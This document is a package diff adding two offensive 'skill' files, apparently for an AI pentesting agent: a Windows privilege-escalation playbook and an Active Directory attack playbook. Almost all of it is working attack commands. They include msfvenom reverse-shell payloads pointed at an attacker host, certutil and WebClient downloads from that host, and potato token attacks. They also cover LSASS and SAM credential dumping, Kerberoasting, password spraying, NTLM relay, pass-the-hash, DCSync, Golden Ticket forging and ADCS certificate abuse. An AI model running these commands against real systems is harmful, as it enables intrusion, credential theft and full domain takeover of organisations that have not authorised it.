@aegis-scan/skills 0.4.0 → 0.5.1

package/skills/offensive/airecon-fork/postexploit-windows-privesc/SKILL.md

@@ -0,0 +1,210 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+---
+name: windows-privesc
+description: Windows privilege escalation — AlwaysInstallElevated, unquoted service paths, weak service permissions, token impersonation, SeImpersonatePrivilege, winpeas, and credential dumping
+---
+
+# Windows Privilege Escalation
+
+Goal: low-privilege user → SYSTEM/Administrator. Enumerate first, exploit second.
+
+**Tools (transfer to target or use from SMB share):**
+```
+# WinPEAS: download winpeas.exe to /home/pentester/tools/
+wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASx64.exe -O /home/pentester/tools/winpeas.exe
+# PowerUp: included in PowerSploit
+# SharpUp: .NET alternative
+# Serve via Python HTTP: python3 -m http.server 8000 --directory /home/pentester/tools/
+```
+
+---
+
+## Automated Enumeration — Start Here
+
+    # Transfer and run winpeas:
+    # From attacker: python3 -m http.server 8000 --directory /home/pentester/tools/
+    # On target (cmd):
+    certutil -urlcache -f http://<attacker>:8000/winpeas.exe C:\Temp\winpeas.exe
+    C:\Temp\winpeas.exe
+
+    # PowerShell download:
+    (New-Object Net.WebClient).DownloadFile('http://<attacker>:8000/winpeas.exe','C:\Temp\winpeas.exe')
+
+    # Manual initial checks (cmd):
+    whoami /priv              # Privileges
+    whoami /groups            # Group memberships
+    net user <username>       # User info
+    net localgroup administrators  # Local admins
+
+---
+
+## Token Impersonation — SeImpersonatePrivilege
+
+Most common privesc on Windows services (IIS, SQL Server, etc.):
+
+    # Check if you have SeImpersonatePrivilege:
+    whoami /priv
+    # SeImpersonatePrivilege = Enabled → potato attacks work
+
+    # Potato attacks (escalate to SYSTEM):
+
+    # PrintSpoofer (Windows 10/2019+):
+    # wget https://github.com/itm4n/PrintSpoofer/releases/latest/download/PrintSpoofer64.exe
+    PrintSpoofer64.exe -i -c cmd
+    PrintSpoofer64.exe -c "powershell -enc <base64_revshell>"
+
+    # GodPotato (most universal — works on Server 2012-2022):
+    # wget https://github.com/BeichenDream/GodPotato/releases/latest/download/GodPotato-NET4.exe
+    GodPotato-NET4.exe -cmd "cmd /c whoami"
+    GodPotato-NET4.exe -cmd "powershell -enc <base64_revshell>"
+
+    # JuicyPotato (older Windows, <Server 2019):
+    # wget https://github.com/ohpe/juicy-potato/releases/latest/download/JuicyPotato.exe
+    JuicyPotato.exe -l 1337 -p C:\Windows\System32\cmd.exe -a "/c powershell -enc <payload>" -t * -c {CLSID}
+    # CLSIDs: https://github.com/ohpe/juicy-potato/tree/master/CLSID
+
+---
+
+## AlwaysInstallElevated
+
+MSI files install as SYSTEM if this registry key is set:
+
+    # Check registry:
+    reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
+    reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
+    # Both must be 1 for exploitation
+
+    # Create malicious MSI (from attacker Kali):
+    msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker> LPORT=4444 -f msi -o priv.msi
+
+    # Install on target:
+    msiexec /quiet /qn /i C:\Temp\priv.msi
+
+---
+
+## Unquoted Service Paths
+
+If a service binary path has spaces and no quotes, Windows tries multiple path interpretations:
+
+    # Find unquoted paths:
+    wmic service get name,pathname,displayname,startmode | findstr /i "auto" | findstr /iv "c:\windows\\" | findstr /iv """
+    # OR:
+    sc qc <service_name>   # Check individual service
+
+    # Example: C:\Program Files\Vulnerable Service\service.exe
+    # Windows tries: C:\Program.exe → C:\Program Files\Vulnerable.exe → C:\Program Files\Vulnerable Service\service.exe
+    # Place malicious binary at first writable location:
+    # Check write permissions:
+    icacls "C:\Program Files\Vulnerable Service"
+    # If writable: drop service.exe there
+    msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker> LPORT=4444 -f exe -o "C:\Program Files\Vulnerable.exe"
+    # Restart service:
+    sc stop "VulnService" && sc start "VulnService"
+
+---
+
+## Weak Service Permissions
+
+    # Check service permissions:
+    accesschk.exe -wuvc Everyone *      # Services writable by Everyone
+    accesschk.exe -wuvc "Authenticated Users" *
+    # Download accesschk: https://learn.microsoft.com/sysinternals/downloads/accesschk
+
+    # If service is writable, change its binary path:
+    sc config <service_name> binPath= "cmd.exe /c net localgroup administrators <user> /add"
+    sc start <service_name>
+    # OR: reverse shell:
+    sc config <service_name> binPath= "C:\Temp\shell.exe"
+    sc start <service_name>
+
+---
+
+## DLL Hijacking
+
+Windows searches for DLLs in a specific order — place malicious DLL first:
+
+    # Find missing DLLs (from Procmon on dev machine, or:)
+    # Check applications that run as SYSTEM and load DLLs from writable directories
+
+    # Create malicious DLL (Kali):
+    msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker> LPORT=4444 -f dll -o hijack.dll
+
+    # Place in application directory if writable, then restart service
+
+---
+
+## Credential Extraction
+
+    # Dump SAM database (requires SYSTEM/Admin):
+    reg save HKLM\SAM C:\Temp\SAM
+    reg save HKLM\SYSTEM C:\Temp\SYSTEM
+    # Transfer to Kali:
+    secretsdump.py LOCAL -sam SAM -system SYSTEM
+
+    # secretsdump.py remotely (from Kali with admin creds):
+    secretsdump.py administrator:password@<target>
+    secretsdump.py -hashes :<NTLM> administrator@<target>
+
+    # LSASS memory dump (requires SeDebugPrivilege / Admin):
+    # Method 1: Task Manager → lsass.exe → Create dump file
+    # Method 2: Via cmd:
+    procdump64.exe -ma lsass.exe lsass.dmp
+    # Method 3: comsvcs.dll (no tools needed):
+    rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <lsass_PID> C:\Temp\lsass.dmp full
+    # Transfer to Kali and parse:
+    pypykatz lsa minidump lsass.dmp
+    # pip install pypykatz --break-system-packages
+
+---
+
+## Scheduled Tasks
+
+    # List all scheduled tasks:
+    schtasks /query /fo LIST /v | findstr /i "task name\|run as\|task to run"
+    # Look for: tasks running as SYSTEM with writable binary paths
+
+    # Modify task binary (if writable):
+    schtasks /change /tn "<task_name>" /ru SYSTEM /tr "C:\Temp\shell.exe"
+
+---
+
+## Stored Credentials
+
+    # Windows Credential Manager:
+    cmdkey /list
+    runas /savecred /user:administrator cmd.exe   # If saved creds exist
+
+    # Unattend.xml (sometimes contains plaintext passwords):
+    type C:\Windows\Panther\Unattend.xml
+    type C:\Windows\Panther\Unattend\Unattend.xml
+    type C:\Windows\System32\sysprep\sysprep.xml
+
+    # PowerShell history:
+    type C:\Users\<user>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
+
+    # Registry saved credentials:
+    reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
+    # Look for: AutoAdminLogon, DefaultUserName, DefaultPassword
+
+---
+
+## Pro Tips
+
+1. SeImpersonatePrivilege = almost guaranteed SYSTEM via GodPotato (works on most modern Windows)
+2. `whoami /priv` first — enabled privileges determine available attack paths
+3. AlwaysInstallElevated = two registry keys must both be 1 — check BOTH HKLM and HKCU
+4. Unquoted service paths need a writable directory in the path — check `icacls` on each directory
+5. `secretsdump.py` remotely = no tools needed on target, extract all NTLM hashes from Kali
+6. PowerShell history often contains passwords typed as arguments — always check
+
+## Summary
+
+Windows privesc checklist:
+1. `whoami /priv` → SeImpersonatePrivilege → GodPotato/PrintSpoofer
+2. `winpeas.exe` → automated full enumeration
+3. AlwaysInstallElevated → malicious MSI
+4. Unquoted service paths → drop binary
+5. Weak service permissions → `accesschk` → `sc config binPath`
+6. `secretsdump.py` → dump all NTLM hashes
+7. Stored credentials in registry, Unattend.xml, PS history

package/skills/offensive/airecon-fork/protocols-active-directory/SKILL.md

@@ -0,0 +1,314 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+---
+name: active-directory
+description: Active Directory attack techniques covering enumeration, Kerberoasting, AS-REP Roasting, Pass-the-Hash, DCSync, ADCS ESC attacks, and ACL abuse
+---
+
+# Active Directory Attacks
+
+AD is the most common enterprise authentication backbone. Compromise follows a pattern: enumerate → credential attack → lateral movement → domain escalation. Most paths lead to DCSync or a Golden Ticket.
+
+---
+
+## Enumeration (Unauthenticated)
+
+### Network Discovery
+
+    # Find DCs
+    nmap -p 88,389,445,636,3268,3269 <subnet> --open -oA output/ad_scan
+    nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain>
+
+    # LDAP anonymous query
+    ldapsearch -H ldap://<dc_ip> -x -s base namingcontexts
+    ldapsearch -H ldap://<dc_ip> -x -b "dc=domain,dc=com" -s sub "(objectclass=*)"
+
+    # SMB null session
+    smbclient -L //<dc_ip> -N
+    enum4linux-ng -A <dc_ip>
+    netexec smb <subnet>/24 --gen-relay-list output/relay_targets.txt
+
+---
+
+## Enumeration (Authenticated)
+
+### BloodHound
+
+    # SharpHound collector (Windows)
+    .\SharpHound.exe -c All --zipfilename output.zip
+
+    # BloodHound.py (Linux — remote collection)
+    bloodhound-python -u <user> -p <pass> -d <domain> -ns <dc_ip> -c All
+    # Or with NTLM hash:
+    bloodhound-python -u <user> --hashes :<ntlm_hash> -d <domain> -ns <dc_ip> -c All
+
+    # Import JSON to BloodHound and look for:
+    # - Shortest path to Domain Admin
+    # - Users with DCSync rights
+    # - Kerberoastable users
+    # - AS-REP Roastable users
+
+### PowerView / ldapsearch Queries
+
+    # Users and groups
+    Get-DomainUser | select name,description,memberof,lastlogon
+    Get-DomainGroup -Identity "Domain Admins" | select member
+    Get-DomainGroupMember "Domain Admins"
+
+    # Kerberoastable accounts (SPN set)
+    Get-DomainUser -SPN | select name,serviceprincipalname
+    ldapsearch -H ldap://<dc> -D "<user>@<domain>" -w <pass> -b "dc=domain,dc=com" \
+      "(&(objectCategory=user)(servicePrincipalName=*))" sAMAccountName servicePrincipalName
+
+    # AS-REP Roastable (no preauth required)
+    Get-DomainUser -PreauthNotRequired | select name
+    ldapsearch -H ldap://<dc> -b "dc=domain,dc=com" \
+      "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" sAMAccountName
+
+    # Password policy (lockout threshold)
+    Get-DomainPolicy | select -ExpandProperty SystemAccess
+
+---
+
+## Credential Attacks
+
+### Kerberoasting
+
+Request service tickets for SPN accounts → offline crack:
+
+    # impacket (Linux)
+    impacket-GetUserSPNs <domain>/<user>:<pass> -dc-ip <dc_ip> -request -outputfile output/kerberoast.txt
+
+    # Rubeus (Windows)
+    .\Rubeus.exe kerberoast /outfile:kerberoast.txt
+
+    # Crack with hashcat
+    hashcat -m 13100 output/kerberoast.txt /usr/share/wordlists/rockyou.txt --force
+
+### AS-REP Roasting
+
+No pre-auth = get encrypted TGT without credentials:
+
+    # impacket (no credentials needed)
+    impacket-GetNPUsers <domain>/ -usersfile output/users.txt -dc-ip <dc_ip> -no-pass -format hashcat \
+      -outputfile output/asrep.txt
+
+    # With credentials (enumerate no-preauth users automatically)
+    impacket-GetNPUsers <domain>/<user>:<pass> -dc-ip <dc_ip> -request -format hashcat
+
+    # Crack
+    hashcat -m 18200 output/asrep.txt /usr/share/wordlists/rockyou.txt
+
+### Password Spraying
+
+    # netexec (formerly CrackMapExec)
+    netexec smb <dc_ip> -u output/users.txt -p 'Password123!' --continue-on-success
+    netexec smb <dc_ip> -u output/users.txt -p output/passwords.txt --no-brute
+
+    # Kerbrute (Kerberos-based, no lockout indicator difference)
+    kerbrute passwordspray -d <domain> --dc <dc_ip> output/users.txt 'Password123!'
+
+### LLMNR/NBT-NS Poisoning (Responder)
+
+    # Capture NTLMv2 hashes from broadcast traffic
+    responder -I eth0 -wv
+
+    # Relay captured hashes (no SMB signing)
+    netexec smb output/relay_targets.txt --gen-relay-list output/nosign.txt
+    impacket-ntlmrelayx -tf output/nosign.txt -smb2support -socks
+
+    # Crack captured NTLMv2:
+    hashcat -m 5600 output/captured.txt /usr/share/wordlists/rockyou.txt
+
+---
+
+## Lateral Movement
+
+### Pass-the-Hash
+
+    # impacket suite
+    impacket-psexec <domain>/<user>@<target_ip> -hashes :<ntlm_hash>
+    impacket-wmiexec <domain>/<user>@<target_ip> -hashes :<ntlm_hash>
+    impacket-smbexec <domain>/<user>@<target_ip> -hashes :<ntlm_hash>
+
+    # netexec
+    netexec smb <target_ip> -u <user> -H <ntlm_hash> -x "whoami"
+
+### Pass-the-Ticket
+
+    # Rubeus — extract and inject TGT
+    .\Rubeus.exe triage
+    .\Rubeus.exe dump /luid:<luid> /nowrap
+    .\Rubeus.exe ptt /ticket:<base64_ticket>
+
+    # impacket — use .ccache file
+    export KRB5CCNAME=ticket.ccache
+    impacket-psexec <user>@<target> -k -no-pass
+
+### Overpass-the-Hash (NTLM → Kerberos TGT)
+
+    # Rubeus
+    .\Rubeus.exe asktgt /user:<user> /rc4:<ntlm_hash> /ptt
+
+    # impacket
+    impacket-getTGT <domain>/<user> -hashes :<ntlm_hash>
+    export KRB5CCNAME=<user>.ccache
+    impacket-psexec <user>@<dc> -k -no-pass
+
+---
+
+## Domain Escalation
+
+### DCSync (requires Domain Replication rights)
+
+Mimics domain controller replication to extract all password hashes:
+
+    # impacket (Linux)
+    impacket-secretsdump <domain>/<user>:<pass>@<dc_ip> -just-dc
+    impacket-secretsdump <domain>/<user>@<dc_ip> -hashes :<ntlm_hash> -just-dc-user Administrator
+
+    # Mimikatz (Windows)
+    lsadump::dcsync /domain:<domain> /user:krbtgt
+    lsadump::dcsync /domain:<domain> /all /csv
+
+### Golden Ticket
+
+With krbtgt hash, forge TGT for any user/group:
+
+    # Get krbtgt hash via DCSync first:
+    impacket-secretsdump <domain>/Administrator@<dc_ip> -just-dc-user krbtgt
+
+    # Forge Golden Ticket (Mimikatz)
+    kerberos::golden /user:Administrator /domain:<domain> /sid:<domain_sid> \
+      /krbtgt:<krbtgt_hash> /ptt
+
+    # impacket
+    impacket-ticketer -nthash <krbtgt_hash> -domain-sid <sid> -domain <domain> Administrator
+    export KRB5CCNAME=Administrator.ccache
+    impacket-psexec Administrator@<dc> -k -no-pass
+
+### Silver Ticket
+
+Forge service ticket for specific service using service account's hash:
+
+    impacket-ticketer -nthash <service_hash> -domain-sid <sid> -domain <domain> \
+      -spn cifs/<target_host> -user-id 500 Administrator
+
+### ACL Abuse
+
+BloodHound reveals ACL edges. Key abusable permissions:
+
+    # WriteDACL over a user → give yourself GenericAll
+    Add-DomainObjectAcl -TargetIdentity <target_user> -PrincipalIdentity <your_user> -Rights All
+
+    # GenericAll over a user → reset password
+    Set-DomainUserPassword -Identity <target_user> -AccountPassword (ConvertTo-SecureString "NewPass123!" -AsPlainText -Force)
+
+    # GenericAll over a group → add yourself
+    Add-DomainGroupMember -Identity "Domain Admins" -Members <your_user>
+
+    # WriteOwner → change ownership → WriteDACL → GenericAll
+    Set-DomainObjectOwner -Identity <target> -OwnerIdentity <your_user>
+
+---
+
+## ADCS (Active Directory Certificate Services)
+
+Check if ADCS is deployed:
+
+    certutil -config - -ping
+    netexec ldap <dc_ip> -u <user> -p <pass> -M adcs
+
+### ESC1 — SAN Injection
+
+Enrollment allows specifying Subject Alternative Name → request cert as any user:
+
+    # Find vulnerable templates
+    certipy find -u <user>@<domain> -p <pass> -dc-ip <dc_ip> -vulnerable
+
+    # Exploit ESC1
+    certipy req -u <user>@<domain> -p <pass> -ca <CA_name> -template <template_name> \
+      -upn administrator@<domain> -dc-ip <dc_ip>
+
+    # Authenticate with certificate
+    certipy auth -pfx administrator.pfx -dc-ip <dc_ip>
+
+### ESC2 — Any Purpose EKU
+
+Same as ESC1 but template has "Any Purpose" or no EKU.
+
+### ESC4 — Vulnerable Certificate Template ACL
+
+    # Template with WriteDACL → modify template to ESC1
+    certipy template -u <user>@<domain> -p <pass> -template <template> -save-old -dc-ip <dc_ip>
+    # Modify template to allow SAN, then exploit as ESC1
+
+### ESC6 — EDITF_ATTRIBUTESUBJECTALTNAME2
+
+CA flag allows SAN on any template:
+
+    certipy req -u <user>@<domain> -p <pass> -ca <CA> -template User \
+      -upn administrator@<domain>
+
+### ESC8 — AD CS Web Enrollment NTLM Relay
+
+    # Relay to HTTP enrollment endpoint
+    impacket-ntlmrelayx -t http://<CA_server>/certsrv/certfnsh.asp \
+      --adcs --template DomainController
+
+    # Use obtained certificate for DCSync or PtT
+
+---
+
+## Credential Extraction (Post-Compromise)
+
+    # Mimikatz in memory
+    .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
+
+    # LSASS dump (remote)
+    impacket-lsadump <domain>/<user>:<pass>@<target>
+
+    # SAM/SYSTEM registry dump
+    impacket-secretsdump <domain>/<user>:<pass>@<target>
+
+    # NTDS.dit extraction (DC)
+    impacket-secretsdump <domain>/<user>:<pass>@<dc_ip> -just-dc
+
+---
+
+## Key Tools
+
+    BloodHound:      bloodhound-python (collection) + BloodHound CE (visualization)
+    Impacket:        GetUserSPNs, GetNPUsers, secretsdump, psexec, ntlmrelayx, ticketer
+    Certipy:         certipy find / req / auth / template / shadow
+    netexec:         smb/ldap/winrm enum, PTH, spray, modules
+    Rubeus:          kerberoast, asreproast, triage, dump, ptt, asktgt
+    Responder:       LLMNR/NBT-NS poisoning, hash capture
+    Mimikatz:        logonpasswords, dcsync, golden/silver ticket, ptt
+    Kerbrute:        user enum, password spray over Kerberos
+
+---
+
+## Attack Chain (Quick Reference)
+
+    Unauthenticated → LLMNR poisoning (Responder) → NTLMv2 hash → crack → valid creds
+    Valid creds → Kerberoast high-priv SPNs → crack → service account creds
+    Valid creds → BloodHound → ACL path to DA → abuse WriteDACL/GenericAll → DA
+    Valid creds → ADCS ESC1 → cert as Admin → DCSync → domain hashes → Golden Ticket
+    DA creds → DCSync → krbtgt hash → Golden Ticket → persistent domain control
+
+---
+
+## Pro Tips
+
+1. Always run BloodHound first — shortest path queries reveal non-obvious attack paths
+2. Kerberoasting is noisy; target only high-value SPNs (SQL admin, web service, backup)
+3. AS-REP roasting is zero-credential — always check even before getting credentials
+4. ADCS ESC1/ESC8 are extremely common and often overlooked — certipy find before anything else
+5. ACL abuse chains (WriteDACL → GenericAll → password reset) leave fewer logs than DCSync
+6. Don't spray passwords — check the password policy first to avoid lockouts
+7. SMB signing must be off for relay attacks — netexec gen-relay-list first
+
+## Summary
+
+AD compromise = credential collection + path finding (BloodHound) + privilege escalation chain. The end goal is DCSync (domain hash dump) or ADCS Golden Cert for persistent access. ADCS is the most underutilized attack path and often the fastest route to DA.